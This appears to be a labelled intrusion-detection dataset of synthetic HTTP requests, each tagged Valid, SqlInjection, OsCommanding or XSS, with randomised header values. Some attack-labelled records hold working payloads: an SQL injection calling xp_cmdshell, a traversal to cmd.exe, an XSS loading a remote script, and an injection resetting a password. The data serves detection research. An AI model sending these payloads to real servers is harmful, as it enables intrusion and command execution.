ETag: "N-_Zl.xtPHZul@X7ViA"
Expect: atctr7=tetz0Vi;iurtb
From: 92hwi@ea1hlu.st
If-Modified-Since: Mon, 30 Oct 06 10:27:08 UTC
If-Unmodified-Since: Fri, 05 Oct 07 01:02:13 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Nov 09 03:30:09 UTC
Max-Forwards: 0
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: Basic bnZ5YzpuY25s
Range: -74002,17-59,16-
Referer: /oqtdsgh/erbnpai/ara5.php4
TE: chunked;q=0.8,trailers,deflate;q=0.7
Trailer: If-Modified-Since
User-Agent: exohdiEi
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: 6.2 233.63.78.190, 2.4 185.253.215.205:63, FTP/4.3 www.aeafstg.png
Transfer-Encoding: 3yai
Upgrade: sty0e/2.8, oag0R/6.1, o9omrp/3.1, sirw/2.4
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9090
Start - Id: 8750
class: Valid
GET /rjB2w0/eea7weEugslHfiuaarri/ctAmtr1YEt/eDwg76Vlw/ICyfIB71WYmeta/bvazCmy/vkK@rPKe/tdS/oDyJOK.cgi?tkXj_vjL=hge&iaaunoaO=+b&eelTgtegrsp=uicao&He=w%27mvar&mbsq=hAqCNPZse-&N1Ginsertd0@-k=group+bynsh HTTP/1.0
Host: 189.23.115.207
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-4, windows-1258;q=0.1
Accept-Encoding: compress
Accept-Language: rat-hIiraL;q=0.7
Cache-Control: no-store
Client-ip: 11.138.13.94
Cookie: AouFts=7e8nr;rof2rhcrsu67=enzeeval;MzKrI_.=43;tte1t7rnoiodaa=oT6;rSuhrqei= tei;u4dN=inWPad
Cookie2: $Version="149"
Date: Thu, 25 Mar 10 08:42:12 CET
ETag: W/"qeLyEBcfbxS4Nls9aX.N"
Expect: 100-continue
From: gtRthpn@euhjO9.it
If-Modified-Since: Fri, 27 Jun 08 01:30:31 GMT
If-Unmodified-Since: Fri, 09 Jul 04 10:54:19 UTC
If-Match: *
If-None-Match: "0-f5XOjTCCRpUfzGrsO"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 8623
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: Basic aW8wdW86eGZtNThlaG8=
Range: 760122-,-173
Referer: http://www.Odnl4n.ch/c0szLba/Ac6Ex/nslpt3ee.cgi
TE: deflate;q=0.5,trailers
Trailer: Accept-Language
User-Agent: 3wJCihEhninnT
UA-CPU: PowerPC
UA-Disp: 036,8992,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 323x9926
Via: HTTP/3.8 38.233.186.80, 3.5 www.tmehi3rt.png:1102, 6.0 182.93.239.66
Transfer-Encoding: deflate
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 85.79.219.185
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8750
Start - Id: 20469
class: Valid
GET /oxdbR62QqnJ97sG94E/cWrA3mA2TAe/busanao/1ONkO42XA7ph/hf3bUFy@MQQZqqn_Z./HDwhttpscgCX/dCki3g/GdaLARD/dre-/3V1QjKU4cvmT/Fhttp7s_J6/Y_Q-kB6yH.tiff?5lotsn=ncat&EQI6hsIipy=%40c%3Dd&CUcateQiAOE=itusretitsrhar&s0nr5kh6r5e=+%7Etelnettecv1na%26&tcsm7v=Eboot.iniyxo%3BetaPftpF HTTP/1.1
Host: www.oman.net:2
Connection: close
Accept: image/*;q=0.9
Accept-Charset: iso-8859-5, x-mac-japanese, iso-2022-kr, iso-8859-4;q=0.3, x-mac-korean
Accept-Encoding: 
Accept-Language: tRs-mmlte, iemlav-a, qlmi4r8t-i6pY7wo;q=0.6, okrnet4-imCtaa
Cache-Control: no-store
Client-ip: 134.251.192.40
Cookie: 0aabeoilsz=0813;eespiidjhkcued=8217;zegrnreoseaetEt=t1dKq1ZTZP;aerije=c13c;VCZRWZ=9
Cookie2: $Version="2"
Date: Tue, 09 Sep 08 17:30:02 UTC
ETag: W/"jAcbol3Xx1Qc.7UnR"
Expect: 100-continue
From: nEews@dw3jo7epe.net
If-Modified-Since: Sun, 28 Nov 04 14:49:01 GMT
If-Unmodified-Since: Fri, 07 Sep 07 21:24:23 UTC
If-Match: "@cWdRfDJfRkmyBNy4F"
If-None-Match: *
If-Range: *
Max-Forwards: 82
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bG5yZWNpOmlubzc=
Authorization: NTLM ajhybmVud3JhZWFjdGlhc2xydTVybnhFdWV5ZWlhaXNBZXR6czFlblQ=
Range: -896,61-724379,-171
Referer: http://www.0reif6a.com/R2eaunea.tar.gz
TE: trailers
Trailer: From
User-Agent: Mozilla/6.0 (compatible; Konqueror/5.1; Linux i586; 5iirta; HdmA)
UA-CPU: MIPS
UA-Disp: 7837,8388,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3372x6941
Via: 0.8 100.65.36.237:155, tdkfa/3.2 158.133.155.17, uettha/7.2 132.61.62.46
Transfer-Encoding: compress
Upgrade: qrcge/0.3, lfahc/7.7
Warning: 215 www.mduxen.jpg "aXuhipm2ei" 
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20469
Start - Id: 23294
class: Valid
GET /ettopu3tn0r7/eQPz0Yu.P2DtWl.jpeg?Bn=aHiY HTTP/1.1
Host: 220.49.217.240:660
Connection: tgxiory
Accept: video/quicktime, text/*;q=0.7
Accept-Charset: iso-2022-kr;q=0.7, us-ascii;q=0.4, x-mac-japanese;q=0.1, euc-cn;q=0.8
Accept-Encoding: compress, deflate
Accept-Language: e-nafavm
Cache-Control: only-if-cached
Client-ip: 168.203.205.51
Cookie: DexecgVitormRG4body=iniee2oms;tie2essr=adelete1;wiRarfonu=fMG;eozohtist=7;5c78p5Kfrm=t0arra&evocsiigri'a;ncheeabLn4Ots=709504
Cookie2: $Version="39"
Date: Thu, 27 Apr 06 19:40:43 GMT
ETag: W/"NUZkkUOZ6GCqV.vSRcdw"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Thu, 02 Feb 06 08:56:00 UTC
If-Unmodified-Since: Sun, 03 Apr 05 07:54:59 CET
If-Match: "biXr5Om.yX@wc37lz"
If-None-Match: "UK-EolPT9BUlD4CIR"
If-Range: *
Max-Forwards: 2040
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM bGFvc25SbDhwYXljY252dDVXT2V0bGluM3NzYnNucmhuZW1zZQ==
Range: -8,52-66986
Referer: /Eavgerld/saies/3wbwe6ob/raodrhoy/To7gxb4.php4
TE: deflate;q=0.6
Trailer: Accept
User-Agent: 66uyneme2m (mioVOysH; hvVRkiFqZg; 6M90Kla; nbnVMf; imj-eN@)
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 626x088
Via: 7.5 222.178.36.35, 9.5 184.231.7.16, FTP/7.6 www.eLeha.css
Transfer-Encoding: gzip
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 500 49.153.182.242 "erstott" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 23294
Start - Id: 24184
class: Valid
GET /2NpSJGGG28b/tkbVpBzZhQrA.tA1zlXX/nnciyBhosc1smtxAahh2/ouGjhG@uZXtAU/tcHZeimw82eintyr8lo.html?ehh5=444842829&VlsOz-s=569&0atlirc3o5p=tV9pu9&cxenzeCbfIer=ltaorzn HTTP/1.1
Host: www.n6nt.org:80
Connection: close
Accept: audio/*;q=0.0, audio/basic;q=0.5
Accept-Charset: ks_c_5601-1987
Accept-Encoding: identity;q=0.2, gzip;q=0.2, deflate, gzip;q=0.7, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 240.233.81.94
Cookie: an0Sa6=kM5;rlxoioau=837873330
Cookie2: $Version="26"
Date: Wed, 28 Jun 06 13:50:50 UTC
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: ayael@sasgerntqn.it
If-Modified-Since: Wed, 28 Sep 05 06:46:55 CET
If-Unmodified-Since: Sat, 25 Apr 09 02:09:05 UTC
If-Match: "8tqG-kRqSvgr.bNMXTt"
If-None-Match: *
If-Range: Sun, 23 Aug 09 16:52:37 GMT
Max-Forwards: 31
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: http://www.e86lye.de/Maiza/sethsdi/t9e6Ibgk/vsnbnuac/cr5nw.tiff
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/5.7 (X11; U; Open BSD i586 7.0; in-eu; rv:6.8.3) Gecko/50134655
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: gzip
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 172.198.248.143
X-Serial-Number: 742584885345002527
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24184
Start - Id: 4602
class: Valid
POST /iywtdt9/hNyxjUQ6RYN@3MxLZq/zuLBwt_Y/nE/rZl4/h2Ue9NSY8N.B.swf? HTTP/1.1
Content-Length: 95
Content-Language: ek,sshj
Content-Encoding: compress
Content-Location: /httSeyy7.css
Content-MD5: cmZ0c29lcnJuaWh0bGVSRA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Oct 06 04:29:18 GMT
Last-Modified: Fri, 21 Aug 09 08:16:14 GMT
Host: 235.84.89.64
Connection: fosie5qo
Accept: */*
Accept-Charset: windows-1250;q=0.6, windows-1251;q=0.7, x-mac-greek;q=0.3, iso-8859-5;q=0.8, utf-7
Accept-Encoding: gzip;q=0.9, deflate, identity, gzip
Accept-Language: ho-sr, ma-H;q=0.4, 8cte5c-iohu;q=0.0, r4am-t15Eoe
Cache-Control: no-transform
Client-ip: 106.70.84.133
Cookie: stnsgiatsvp=3024099;ad=tyrYe;cbfbtoe5trae3x=adatswmyital7tre
Cookie2: $Version="7"
Date: Fri, 21 Jul 06 07:12:02 UTC
ETag: "sg@ihNTuVOy75ZcaHms"
Expect: aul2t=nesi
From: shme@uth2.org
If-Modified-Since: Sun, 06 Feb 05 14:37:43 GMT
If-Unmodified-Since: Sat, 20 Oct 07 05:33:39 CET
If-Match: "os6uoAnYzHHjtITY"
If-None-Match: "6pR9mJkKkSMUMyFOwh"
If-Range: Fri, 04 Dec 09 17:40:25 GMT
Max-Forwards: 0
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bEFlbm93aWhuZTZvNmUzaFNsYTRiMm5zbzRlcGFzY3Rs
Range: -6763
Referer: http://h1aruire.de/oRye/h6eEncth/o1tIt/pnpsH.gif
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 7.8; cd-eo; rv:1.9.6) Gecko/40008685
UA-CPU: Sparc
UA-Disp: 456,796,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2066x525
Via: FTP/9.7 www.ctih.html:486, 5.0 www.rv9q.gif, FTP/6.8 www.5evsrho.jpg
Transfer-Encoding: identity
Upgrade: veh/9.0, cojts/9.3, tnc/9.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 229.244.68.193
X-Serial-Number: 94988
----: -----------------
~~~~~: ~~~~~~~~~~~~

WmBbNz=147&retiiEinin=sxtouhe&Snrrslrlie=D3nh17ni9&4_2Mm7=eliframe o&ornmXperlqYjXThaving=72968

End - Id: 4602
Start - Id: 32239
class: Valid
GET /nao-OomghLlfEF/ts2zUEZL93q8/lz3rcanYf/Qx.p/ogmf7u/tBs1Hzpntwi3lcz3ne/rIsBwajP/u2aaDuoisfe7rl4N/xtt/ieeP3HigixfX/itsc.js?8xmsk1silacaeos=74993683&edw=lijardtceeocleeh&s1hohtehs=95063&8y5Jxml1K=%2Btpasswdi8aawtfnaen+pb HTTP/1.0
Host: 4.30.18.7:6
Connection: keep-alive
Accept: video/quicktime;q=0.9
Accept-Charset: iso-8859-9;q=0.3, x-mac-hebrew;q=0.6, x-mac-japanese, windows-1251;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=19
Client-ip: 243.197.188.10
Cookie: BAgtmpe-pHg.=003402;tppGxml73J=006;radsrts1v2nqi=nnlsig7eTynLu;bgsound4sA-=asOxYGc3heHO;onepean=gnEn 
Cookie2: $Version="994"
Date: Wed, 14 Jun 06 14:10:37 CET
ETag: "52QtU01ChCXqCgIMc3n"
Expect: liiw=oSls
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Sat, 06 Mar 04 24:59:25 GMT
If-Unmodified-Since: Fri, 02 Mar 07 15:41:46 CET
If-Match: ".C.4xwdYFKPkrsYAoHx4"
If-None-Match: "rKfNTdmtNvwcvvz"
If-Range: Sun, 26 Oct 08 01:05:12 CET
Max-Forwards: 1058
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="udr5p1ia"
Authorization: NTLM OXJBcmVPbnJ3M2VpSHJnOHRoY3RsZGFISW9lcm56OWFn
Range: -594,-1001,-2
Referer: /iVlaal/atttrtu/erodbn.mp3
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.0 (compatible; MSIE 1.9; Open BSD i586; oto1sfesmu)
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 800x1490
Via: 9.1 www.suaact.gif, HTTP/5.2 206.202.245.77:6, 5.6 52.71.81.81
Transfer-Encoding: gzip
Upgrade: atnr9/2.7, 0rq/7.6
Warning: 336 182.21.42.184:1 "eedHahvhhraslhmrAtow" "Thu, 26 Aug 04 11:09:03 CET"
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32239
Start - Id: 41104
class: SqlInjection
GET /neMsbno8lidw4e/tRLPXGZG.d/eaSjtIcEesertcj4su.aspx?6i0dtcar4ke=yarEyoerhfid&9COinsert8-c=e&mdph=5%28&3v_3FxKUdD=mpsEit+dyiayR%3Cat&awesoT=eidhqlniUihde&trhhtrgEfhl0td=0O9Vneohr1l1s0&xyewwhse=sTK&nq7tle=igw5&Govs5rH-XOjN=eodmmqg-4y8J&@_BQQ_k8=%27%3BEXEC+++++master.dbo.xp_cmdshell+++++%27cmd.exe HTTP/1.1
Host: www.t1ecdct.st:37123
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: oewsren-atea, Tntre5y-e;q=0.6, lbfIxlel-eadln;q=0.8
Cache-Control: max-stale=7132
Client-ip: 26.15.87.96
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Wed, 11 Apr 07 02:06:14 GMT
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ctnineei@15crtioebx.de
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Fri, 25 Dec 09 05:50:19 UTC
If-Match: "vNJ.rQ4m4RT0t61zyP"
If-None-Match: "aKihmhKJiNeeRiCI"
If-Range: *
Max-Forwards: 7609
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: 4a1uo 4pt9hp=4broyo
Range: -397
Referer: http://www.DmEe2t.st/vtot8.pl
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 0.6; em-An; rv:1.0.1) Gecko/98743666
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: 0.3 254.216.81.43
Transfer-Encoding: proa2
Upgrade: rsie/6.2, ped/8.7, tlgq/8.5, FsiO/2.3
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41104
Start - Id: 44073
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 158.58.121.141
Connection: ffDeof
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=73115
Client-ip: 103.148.81.42
Cookie: CCxPH=ecSzua
Cookie2: $Version="25"
Date: Sat, 18 Nov 06 06:22:04 UTC
ETag: W/".Z.c4.xeA3kSTWv"
Expect: 100-continue
From: eyde@enOee.biz
If-Modified-Since: Wed, 17 Aug 05 22:30:48 GMT
If-Unmodified-Since: Wed, 27 Jul 05 20:03:15 GMT
If-Match: "4izoy@O-uWLf6iB"
If-None-Match: ".ijCCt_q3_8c9nqJu"
If-Range: "C1H9fyXqPdeZ7PAV4MsR"
Max-Forwards: 1
MIME-Version: 3.4
Pragma: g=e
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: bIaa veahoau=hRen
Range: 20-
Referer: /rasetrob.fgf
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.9 (compatible; Konqueror/7.2; Open BSD i586; as0osc; dpsi; cm5f)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: 7.1 94.224.137.87, 1.3 www.ihyde.shtml, 9.4 47.50.23.59:6
Transfer-Encoding: deflate
Upgrade: unHis2/9.7, sDw/8.7
Warning: 247 www.hxe31.png "9a02iegsdsel8esiecoC" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44073
Start - Id: 32366
class: Valid
GET /e@DoardpK/loK5V8-TfTNQ3LqT.l7d/tDLXr3-C.jpg?acuOefN7y=aSraALU8&vwiaSr6t=+tere2%3Crm%3Asah&oeAWo1ae=shhdi&idyRme=ee%27dTh+smocha&m8=81899997&Et=ljeUS9XCtcC-&Ounlndguur=th1Opasswdr0%24a138ee2Eo%26D&ieheO=3110&f58d5OltNrcAb7=bHdV8LjFB1x&saMeds1pktr=uf5UEIIa7g7 HTTP/1.1
Host: www.T6Rnbk8uo.cz
Connection: close
Accept: text/html, image/gif;q=0.4, application/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: uml-mn3re4z, 3em87ti-ebescAlf;q=0.3, 6argxr-eruoi, sntyetI-pktlLts
Cache-Control: max-age=45
Client-ip: 207.129.23.222
Cookie: 3D=06426945;osiwepo=s8ydwhaw6oqe;anMw=5 nreiboot.ini yse;fma=hVl4wLR.D80w;dylty=836266186
Cookie2: $Version="537"
Date: Fri, 24 Sep 04 21:04:24 UTC
ETag: "dO1GC2Ti8NVsqAEapMKP"
Expect: ifevrnpw=lsoed;huSi=sNi7ezt
From: nTc4g7an@ldne.de
If-Modified-Since: Sat, 14 Feb 04 06:41:47 CET
If-Unmodified-Since: Sat, 06 Jan 07 10:30:52 CET
If-Match: *
If-None-Match: "dEPyO5z.HyN@O4wf3cY"
If-Range: "wglYueljVmSzoEQs6Kq"
Max-Forwards: 5
MIME-Version: 5.0
Pragma: RgNhoie=taoet955
Proxy-Authorization: Erqi nkto=rllhitln
Authorization: tc3tp ixha=8adas
Range: -767,36952-,-33
Referer: http://www.cshafig.fr/anan/ncUatun/f91pewr/klhrDeet/c1d1noto.jpg
TE: trailers,chunked;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/6.2 (compatible; tklkbgwt; Mac OS X; utjt; 6rge)
UA-Disp: 7576,7473,16
UA-OS: Windows 98
UA-Color: color16
Via: 7.2 www.eohh8c.css, sbo/7.2 179.147.116.46
Transfer-Encoding: compress
Upgrade: efetu/5.8, xwp/3.1, aeabu/6.7
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 88.70.121.27
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32366
Start - Id: 9977
class: Valid
GET /7er/Reefaaettk/tDu2vepdyfO_GRX/nht6WD/oeCdir.js?eeztgteeps=o4aso6itiooW7ii6U&jmsbtseHbsre=h HTTP/1.0
Host: 253.230.18.77:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: identity, deflate, gzip;q=0.3
Accept-Language: ib7-tsnbo, ejebNyTn-5Zwa8ght;q=0.4, netit-eraasi;q=0.4
Cache-Control: no-transform
Client-ip: 41.19.16.178
Cookie: eetw7un=eu0atGraeles4nteb;EknO5-NJO8=29521;childYnt=hirAkt
Cookie2: $Version="778"
Date: Wed, 08 Oct 08 13:37:52 GMT
ETag: "wvjrXXE5a.WwKKN"
Expect: rhteamu
From: eiroNoe@sullhsta.net
If-Modified-Since: Tue, 03 Jun 08 21:11:58 UTC
If-Unmodified-Since: Thu, 26 Jul 07 15:54:09 CET
If-Match: "OzBE-ox0Q5R3NMi3l3"
If-None-Match: "THph-CYM4ia8hVl7"
If-Range: Sat, 18 Nov 06 16:17:57 UTC
Max-Forwards: 858
MIME-Version: 0.9
Pragma: Ea8a='zAtft'
Proxy-Authorization: Digest nonce
Authorization: tato6a aseae=bumete
Range: -96
Referer: /neaossc/51dt/mn3ee4.aspx
TE: trailers
Trailer: User-Agent
User-Agent: exuoo2x77k (edznCEMe-; ejzeMvj0; s@9fTxw)
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/6.4 63.208.229.94
Transfer-Encoding: deflate
Upgrade: b2bhql/3.8
Warning: 614 www.ybpt.js "ithwrochasw4rgehd" 
X-Forwarded-For: 42.220.161.64
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9977
Start - Id: 47842
class: XSS
GET /Ioee.shtml?lonetmeao=lnetcatauenrI&eiaaiv=a&riRd0sueteaeo=5T&Wro=%3Cdiv+++++style+%3D+++%22++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.manamant.com%2Fscript%2Fess3lEneN.php4%5D%29%3B+%22+++%3E&KsQ1lVEjVaeval=seperlilnfe63qTtdrop%3E&euen=6+oem&nyu6DwyRU=ose&yti=93&q@WEFYAWu8=7488&seooLnf3str2y=08&iosaeiektkgte2=%40slikenelr&2lsbuMeTotiftao=0249758710&nsmR8yteqht=srkrgAbsbzjo&vmRSO70LP=71150740 HTTP/1.1
Host: www.dlgtOint.biz
Connection: close
Accept: image/*;q=0.8, video/*, application/rtf;q=0.8
Accept-Charset: iso-10646-ucs-2, iso-8859-9, windows-1253
Accept-Encoding: compress;q=0.3
Accept-Language: 9e-Ec;q=0.3, 0yxa-etuKe;q=0.4
Cache-Control: no-transform
Client-ip: 38.125.73.120
Cookie: 8pta=ozoerc;eeiei=538850084;shutdownWiwindow.open=fdwis;isKc3SWhTrozr6=etmhs ovS&haa;oniHa=oc;nrhynarsueseil=b6orao9g
Cookie2: $Version="459"
Date: Tue, 19 Feb 08 13:12:31 GMT
ETag: W/"h.o9mDWvBmOAdKm@W"
Expect: er7hdEG=yegd6jr;z1nte=wyzEmd
From: rntaoh@dim7.fr
If-Modified-Since: Mon, 22 May 06 06:49:15 GMT
If-Unmodified-Since: Sat, 17 Apr 04 11:27:20 GMT
If-Match: "yumdA@uyDW-Z.RJC"
If-None-Match: "pbIh@KFq.PWEdT8k"
If-Range: "L1pBSGEMNIT-en7_6M"
Max-Forwards: 0628
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZWhOM3V1eDplckx0bnM=
Authorization: NTLM ZXNkb2xlbWR4bkFuZWZ1d3I2aGlJVG5lc2lhaG90dm5UckVyZU8=
Range: 035-1,0779-,77-
Referer: http://www.fe13oge.net/haas.msf
TE: chunked,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: Mozilla/7.1 (compatible; Konqueror/0.7; Win98; neirbdj; ynlyi9o7ea; ifeilpwad)
UA-Disp: 5072,477,16
Via: g1h/7.2 144.115.175.48
Transfer-Encoding: identity
Upgrade: oeeepq/9.5
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 98.250.156.118
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47842
Start - Id: 42605
class: SqlInjection
GET /XBexec5Ck/Gpj/t6anhkittiolr/u9nond1t.css?AbCE=%3Balter+++++table++llnsst+++++set++password++++%3D++%27ito6e%27++where+++name++%3D++%27alEfeo%27%3B HTTP/1.1
Host: 231.181.157.190
Connection: fnde1Inh
Accept: */*;q=0.9
Accept-Charset: koi8;q=0.9, windows-1251;q=0.1, euc-kr;q=0.7, x-mac-chinesesimp, x-mac-arabic
Accept-Encoding: 
Accept-Language: retes-8Mng
Cache-Control: no-cache
Client-ip: 30.185.17.82
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="62"
Date: Sat, 01 Oct 05 05:50:32 GMT
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: ioed@oROvlcftKp.biz
If-Modified-Since: Tue, 23 Mar 04 21:40:43 UTC
If-Unmodified-Since: Mon, 29 Oct 07 18:54:04 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Sep 04 17:01:26 GMT
Max-Forwards: 9258
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YnB0bmUwbzpzU2Vydw==
Referer: http://www.eauMe.be/Dnet/gerd/gxuD/tutcr/9Eb4v0a.js
TE: trailers,gzip;q=0.2,deflate;q=0.8
Trailer: Warning
User-Agent: aeptfs (wqJqHi8bxC; t2@fGtszt; axJOA@0EJ; cW_Ujg)
UA-CPU: Sparc
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: HTTP/1.3 185.219.3.188
Transfer-Encoding: identity
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42605
Start - Id: 8668
class: Valid
GET /61on/22cdgs45/pthwscdwel.shtml?use1gmnnrieh=8263&Q516IyS-=eRk%5Dallhwp-%27+t&24o=npI1darFeEbAnmx1e HTTP/1.1
Host: 63.51.72.103:75821
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 164.241.30.188
Cookie: wielt1=mcgm;itdaYGppsefgr=wheretac
Cookie2: $Version="778"
Date: Sat, 03 Apr 04 10:54:29 UTC
ETag: W/"q3Zr@-ZHTeohjPjoYTq"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Mon, 12 Apr 10 05:55:47 GMT
If-Unmodified-Since: Mon, 07 Feb 05 22:13:57 GMT
If-Match: *
If-None-Match: "hQzFq0@Rqt@vT94"
If-Range: "Lpxvh1lIWHAzR6ZDQ"
Max-Forwards: 80
MIME-Version: 1.4
Pragma: nva='1'
Proxy-Authorization: ns7siw llzif0=ebeiais
Authorization: NTLM YWdtc2VzZW9zaWJpMmJ4YWk3OHNhMU9zbWhleGVzbHNoaVJkb3hkZWlBYjRzbHJk
Range: -766,58-986789
Referer: http://rozott.st/tfhhtnom/tnie/nnua/apndTs/sleiuf.wmn
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/4.3 (Windows; U; WinNT 2.5; yd-oe; rv:3.5.7) Gecko/80496888
UA-CPU: MIPS
UA-Disp: 502,6402,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8393x485
Via: HTTP/5.8 www.zenheEci.gif, j1i/5.8 www.peeeqh.png, HTTP/1.9 www.eTeEaa.htm
Transfer-Encoding: gzip
